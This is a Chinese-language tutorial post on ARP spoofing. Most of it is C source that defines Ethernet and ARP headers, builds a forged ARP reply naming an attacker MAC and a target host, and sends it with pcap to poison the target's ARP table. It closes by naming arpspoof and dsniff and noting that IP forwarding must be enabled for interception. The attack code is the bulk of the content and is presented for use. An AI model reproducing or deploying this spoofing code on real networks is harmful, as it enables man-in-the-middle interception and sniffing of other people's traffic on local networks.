ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗。解决办法详见百科
#define ETHER_ADDR_LEN 6
typedef struct
{
u_char DestMAC[ETHER_ADDR_LEN]; //目的MAC地址 6字节
u_char SourMAC[ETHER_ADDR_LEN]; //源MAC地址 6字节
u_short EthType; //上一层协议类型,如0x0800代表上一层是IP协议,0x0806为arp 2字节
}EthernetHeader;
// 28 bytes ARP request/reply
typedef struct
{
u_short HardwareType; //硬件类型,2字节,定义运行ARP的网络的类型,以太网是类型1
u_short ProtocolType; //协议类型,2字节,定义上层协议类型,对于IPV4协议,该字段值为0800
u_char HardwareAddLen; //硬件地址长度,8位字段,定义对应物理地址长度,以太网中这个值为6
u_char ProtocolAddLen; //协议地址长度,8位字段,定义以字节为单位的逻辑地址长度,对IPV4协议这个值为4
u_short OperationField; //操作字段,数据包类型,ARP请求(值为1),或者ARP应答(值为2)
u_char SourceMacAdd[6]; //源(发送端)mac地址,可变长度字段,对以太网这个字段是6字节长
u_char SourceIpAdd[4]; //源(发送短)ip地址,发送端协议地址,可变长度字段,对IP协议,这个字段是4字节长
u_char DestMacAdd[6]; //目的(接收端)mac地址
u_char DestIpAdd[4]; //目的(接收端)ip地址,注意不能为u_int型,结构体对其
}ArpHeader;
//封装以太网头
void fillEthernetPacket(u_char *sourMAC, u_char *destMAC)
{
memset(&this->ethHdr, 0, sizeof(this->ethHdr));
memcpy(this->ethHdr.SourMAC, sourMAC, sizeof(this->ethHdr.SourMAC));
memcpy(this->ethHdr.DestMAC, destMAC, sizeof(this->ethHdr.DestMAC));
this->ethHdr.EthType = htons(ARP_TYPE);
}
//封装ARP头
void fillArpPacket(u_char* srcMac,char *srcIp,u_char *destMac,char *destIp)
{
this->arpHdr.HardwareAddLen = 6;
this->arpHdr.ProtocolAddLen = 4;
this->arpHdr.HardwareType = htons(ARP_HARDWARE);
this->arpHdr.ProtocolType = htons(IP_TYPE);
this->arpHdr.OperationField = htons(ARP_REPLY);
memcpy(this->arpHdr.SourceMacAdd, srcMac, sizeof(this->arpHdr.SourceMacAdd));
memcpy(this->arpHdr.DestMacAdd, destMac, sizeof(this->arpHdr.DestMacAdd));
u_long srcIpN = htonl(pcap.my_inet_addr(srcIp));
memcpy(this->arpHdr.SourceIpAdd, (u_char*)&srcIpN, sizeof(this->arpHdr.SourceIpAdd));
u_long destIpN = htonl(pcap.my_inet_addr(destIp));
memcpy(this->arpHdr.DestIpAdd, (u_char*)&destIpN, sizeof(this->arpHdr.DestIpAdd));
}
//封装ARP包
void fillPacket()
{
memset(this->packet, 0, sizeof(this->packet));
// 填充以太网头,为广播方式
memcpy(this->packet, &this->ethHdr, ETHERNET_HEAD_LENGTH);
// 填充arp头
memcpy(this->packet + ETHERNET_HEAD_LENGTH, &this->arpHdr, ARP_BODY_LENGTH);
}
// 发送ARP欺骗包
void sendArpCheatPacket()
{
/* Send down the packet */
if (pcap_sendpacket(this->adhandle, // Adapter
packet, // buffer with the packet
ARP_PACKET_LENGTH // size
) != 0)
{
qDebug("
Error sending the packet: %s
", pcap_geterr(this->adhandle));
return;
}
}
int main()
{
/*
* hostInfo.mac:攻击者MAC
* cheatHostInfo.mac:攻击对象MAC
*/
fillEthernetPacket(this->hostInfo.mac, cheatHostInfo.mac);
/*
* hostInfo.mac:攻击目标ARP表中,hostInfo.ip对应的mac替换为此mac地址
* hostInfo.ip:攻击目标ARP表中,被替换mac的ip地址
* cheatHostInfo.mac:攻击目标mac地址
* cheatHostInfo.ip:攻击目标ip地址
*/
fillArpPacket(this->hostInfo.mac, this->hostInfo.ip,
cheatHostInfo.mac, cheatHostInfo.ip);
sendArpCheatPacket();
}
当攻击目标发送ARP请求的时候,ARP欺骗回应包就会更新其ARP表
相关工具包介绍
arpspoof:arp欺骗的工具
dsniff:网络嗅探工具包
注:需要打开IP转发